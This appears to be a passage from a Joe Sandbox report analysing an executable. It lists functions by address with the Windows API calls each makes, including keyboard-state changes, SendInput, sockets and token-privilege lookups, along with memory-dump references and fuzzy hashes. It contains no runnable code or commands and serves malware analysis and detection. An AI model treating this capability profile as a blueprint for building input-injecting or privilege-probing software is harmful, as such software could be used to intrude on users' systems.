                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                        • Instruction ID: 7d1f69868400345489bb9f6e7e79aa1bc4878110ecca1fb23f84923dcd63f26c
                                                                                        • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                        • Instruction Fuzzy Hash: 7941B835A007169BDF28CF69C8A0FAF7BB5AF483A0B25823DE45587650D770DD408B4C
                                                                                        Function 00AFA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AFA68A
                                                                                        • __itow.LIBCMT ref: 00AFA6BB
                                                                                          • Part of subcall function 00AFA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AFA976
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AFA724
                                                                                        • __itow.LIBCMT ref: 00AFA77B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: b3e5bc3c97e52d4cf8547653103b4dc61dd7fcf6f7b2a96e384b6db2446c4b59
                                                                                        • Instruction ID: e4f6b1d926c07143dc3f53b2dc199a57e0e31eb3fc8aa4378a4e2ca0a5ddc48f
                                                                                        • Opcode Fuzzy Hash: b3e5bc3c97e52d4cf8547653103b4dc61dd7fcf6f7b2a96e384b6db2446c4b59
                                                                                        • Instruction Fuzzy Hash: 224184B4A0030DABDF11EF94C955FFE7BB9EF54750F440059FA09A3292DB709944CA92
                                                                                        Function 00B17095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00B170BC
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B170CC
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B17130
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B1713C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                        • String ID:
                                                                                        • API String ID: 2214342067-0
                                                                                        • Opcode ID: 3cea487074a154a6159ef22ee4ac932bf0b7c5ca32e34ff25ecf659d05d1a9d5
                                                                                        • Instruction ID: 04aade947b77f2c05fe8ff9402fbd4dc244668fd0309d1bc947678b0e2dd0340
                                                                                        • Opcode Fuzzy Hash: 3cea487074a154a6159ef22ee4ac932bf0b7c5ca32e34ff25ecf659d05d1a9d5
                                                                                        • Instruction Fuzzy Hash: FA41A271740200AFE721AF24DD86F6E77E4DF49B10F548458FA59AB3D2DBB09C008B91
                                                                                        Function 00B16B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B30980), ref: 00B16B92
                                                                                        • _strlen.LIBCMT ref: 00B16BC4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID:
                                                                                        • API String ID: 4218353326-0
                                                                                        • Opcode ID: 8b7d9eb89b47c0600196aa0385826d9a68ef55f77ae2d307431789f50dba02bc
                                                                                        • Instruction ID: 46241da82dfcfad281f7a54d1e4b76ac5a49bcbd715290efdea391134d1719a7
                                                                                        • Opcode Fuzzy Hash: 8b7d9eb89b47c0600196aa0385826d9a68ef55f77ae2d307431789f50dba02bc
                                                                                        • Instruction Fuzzy Hash: 0F41B031A04108AFCB14EBA4CED1EEEB3E9EF55310F548199F91A9B292DB30AD41C790
                                                                                        Function 00B28E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B28F03
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: d395b7843be40b234d31584d6156fd82e540255ca472dcd6176c70425b437977
                                                                                        • Instruction ID: 0434f055fed71be525e9a4a80982447baaf7122dbbca3ec0c9a42fc870b63e34
                                                                                        • Opcode Fuzzy Hash: d395b7843be40b234d31584d6156fd82e540255ca472dcd6176c70425b437977
                                                                                        • Instruction Fuzzy Hash: A3310630652228AFEF209A18ED85FAC37E6EB05310F244D91FA19D71E0CF74E950CB91
                                                                                        Function 00B2B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2B1D2
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B2B248
                                                                                        • PtInRect.USER32(?,?,00B2C6BC), ref: 00B2B258
                                                                                        • MessageBeep.USER32(00000000), ref: 00B2B2C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 493ba7f67d7832d47e257bb7e5d0096faae7562d04f2cd0bd4d49812e5c106d1
                                                                                        • Instruction ID: 6264b8ff1368cfc9ccd19bbe27b708426752a4b3e5a26eb82ed011226a390272
                                                                                        • Opcode Fuzzy Hash: 493ba7f67d7832d47e257bb7e5d0096faae7562d04f2cd0bd4d49812e5c106d1
                                                                                        • Instruction Fuzzy Hash: C8413930A04229DFDB11CF99E884EAD7BF5FF49315F2885E9E8189B255DB30A941CB90
                                                                                        Function 00B012D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B01326
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B01342
                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B013A8
                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B013FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: a4c2fa2675a89e35cb2b7be4bd7dd73ade9fc2362d47277cd4c6569d1ca02b4f
                                                                                        • Instruction ID: 9e033d045d2e41fd05afc08142b43a4d15019ce10a61613e696957a325dfc876
                                                                                        • Opcode Fuzzy Hash: a4c2fa2675a89e35cb2b7be4bd7dd73ade9fc2362d47277cd4c6569d1ca02b4f
                                                                                        • Instruction Fuzzy Hash: 37314830A40208BEFF398A2D8C45BFE7FF9EB44320F04869AF590526D1D7748D519B69
                                                                                        Function 00B01410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00B01465
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B01481
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B014E0
                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00B01532
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: bb33a382fb9ac5b99cd92910da56753894b5ccb8715efe8665fbddd9ad3c5869
                                                                                        • Instruction ID: 56583ba2241fea8212aa6a2ab9c6eb6c7c2b3f853465935f7293db22bee2021a
                                                                                        • Opcode Fuzzy Hash: bb33a382fb9ac5b99cd92910da56753894b5ccb8715efe8665fbddd9ad3c5869
                                                                                        • Instruction Fuzzy Hash: A33148309402085EFF388A6D8C04BFEBFE5EF95310F084B9AE481562E1C37889558F61
                                                                                        Function 00AD63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD642B
                                                                                        • __isleadbyte_l.LIBCMT ref: 00AD6459
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD6487
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD64BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 53cc3dcb2b863660d7be6810b40ce98f19d85d39eb68ecc38b381677eacd266d
                                                                                        • Instruction ID: e3483bf37e088ecaf67c585b205ea62c9022dda5e80452b39849696112318c91
                                                                                        • Opcode Fuzzy Hash: 53cc3dcb2b863660d7be6810b40ce98f19d85d39eb68ecc38b381677eacd266d
                                                                                        • Instruction Fuzzy Hash: 5131C1B1600256AFDF218F75CE44BAA7BB5FF41320F15802AF86697291DB31E850DB50
                                                                                        Function 00B2552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00B2553F
                                                                                          • Part of subcall function 00B03B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B03B4E
                                                                                          • Part of subcall function 00B03B34: GetCurrentThreadId.KERNEL32 ref: 00B03B55
                                                                                          • Part of subcall function 00B03B34: AttachThreadInput.USER32(00000000,?,00B055C0), ref: 00B03B5C
                                                                                        • GetCaretPos.USER32(?), ref: 00B25550
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00B2558B
                                                                                        • GetForegroundWindow.USER32 ref: 00B25591
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 4f599db776d51a9639a1f4b07c862ee355e0fc3c4bf6213fc0783d1af13d41ce
                                                                                        • Instruction ID: 4705d6b6a57ea88119239b530f97d36f2486b6312e2383af1c8665187ebfdbfd
                                                                                        • Opcode Fuzzy Hash: 4f599db776d51a9639a1f4b07c862ee355e0fc3c4bf6213fc0783d1af13d41ce
                                                                                        • Instruction Fuzzy Hash: D0312A72900108AFDB10EFB5D9859EEB7F9EF99304F1044AAF515E7241EB71AE448BA0
                                                                                        Function 00B2CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • GetCursorPos.USER32(?), ref: 00B2CB7A
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ADBCEC,?,?,?,?,?), ref: 00B2CB8F
                                                                                        • GetCursorPos.USER32(?), ref: 00B2CBDC
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ADBCEC,?,?,?), ref: 00B2CC16
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: ce3b88e108c0e9c9747fdffb8ccc6dc14ebd1ed944b61f4c81c83f86fe55b601
                                                                                        • Instruction ID: 18456401937b0973956fc1e68889ec1f50969f9e97ffb6f88ead16c5073bfc58
                                                                                        • Opcode Fuzzy Hash: ce3b88e108c0e9c9747fdffb8ccc6dc14ebd1ed944b61f4c81c83f86fe55b601
                                                                                        • Instruction Fuzzy Hash: 2231E134600068AFCB119F59D899EBE7FF5EF49310F004099F809972A1CB355D50EFA0
                                                                                        Function 00AC0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __setmode.LIBCMT ref: 00AC0BE2
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07E51,?,?,00000000), ref: 00AB4041
                                                                                          • Part of subcall function 00AB402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07E51,?,?,00000000,?,?), ref: 00AB4065
                                                                                        • _fprintf.LIBCMT ref: 00AC0C19
                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00AF694C
                                                                                          • Part of subcall function 00AC4CCA: _flsall.LIBCMT ref: 00AC4CE3
                                                                                        • __setmode.LIBCMT ref: 00AC0C4E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 521402451-0
                                                                                        • Opcode ID: 27be150b8abda16283240287ae430ec3988c51ba09eb4612a66be7a0ebfb2631
                                                                                        • Instruction ID: c12d9595764c6788505daf98823ef3e80508d139b27dd4eb1e67cd9da1d05c3b
                                                                                        • Opcode Fuzzy Hash: 27be150b8abda16283240287ae430ec3988c51ba09eb4612a66be7a0ebfb2631
                                                                                        • Instruction Fuzzy Hash: 1F112431908208AADB08B7A8AD52EFE7B6DDF49320F11015DF204972C2DF615D5257A5
                                                                                        Function 00AF9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8D3F
                                                                                          • Part of subcall function 00AF8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D49
                                                                                          • Part of subcall function 00AF8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D58
                                                                                          • Part of subcall function 00AF8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D5F
                                                                                          • Part of subcall function 00AF8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8D75
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AF92C1
                                                                                        • _memcmp.LIBCMT ref: 00AF92E4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AF931A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00AF9321
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1592001646-0
                                                                                        • Opcode ID: eee850e7875ac1413894aeb20863a120a2cf751f6615f70758105b86e47a687f
                                                                                        • Instruction ID: 19a6d64b170b53d9252163167f1000cc1376de6402f2beeb818dddc1cd90c9d1
                                                                                        • Opcode Fuzzy Hash: eee850e7875ac1413894aeb20863a120a2cf751f6615f70758105b86e47a687f
                                                                                        • Instruction Fuzzy Hash: E8218932E4020DAFDB10DFE4C945BFEB7B8EF44301F144199E994AB290DB70AA44CBA0
                                                                                        Function 00B2634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00B263BD
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B263D7
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B263E5
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B263F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 950f4e925241d965f662d7efa14877d9f8817b1081153631460c939bb983bd8a
                                                                                        • Instruction ID: e2e83e5f9f40aae3970e33764d4d951014105b41512ffce02d8f37ad5ff49e49
                                                                                        • Opcode Fuzzy Hash: 950f4e925241d965f662d7efa14877d9f8817b1081153631460c939bb983bd8a
                                                                                        • Instruction Fuzzy Hash: 0211B631305524AFDB05AB28DC95FBE77D9EF86320F144159F91AC72D1CBA0AD01CB99
                                                                                        Function 00AFE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AFF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AFE46F,?,?,?,00AFF262,00000000,000000EF,00000119,?,?), ref: 00AFF867
                                                                                          • Part of subcall function 00AFF858: lstrcpyW.KERNEL32(00000000,?), ref: 00AFF88D
                                                                                          • Part of subcall function 00AFF858: lstrcmpiW.KERNEL32(00000000,?,00AFE46F,?,?,?,00AFF262,00000000,000000EF,00000119,?,?), ref: 00AFF8BE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AFF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE488
                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00AFE4AE
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AFF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE4E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
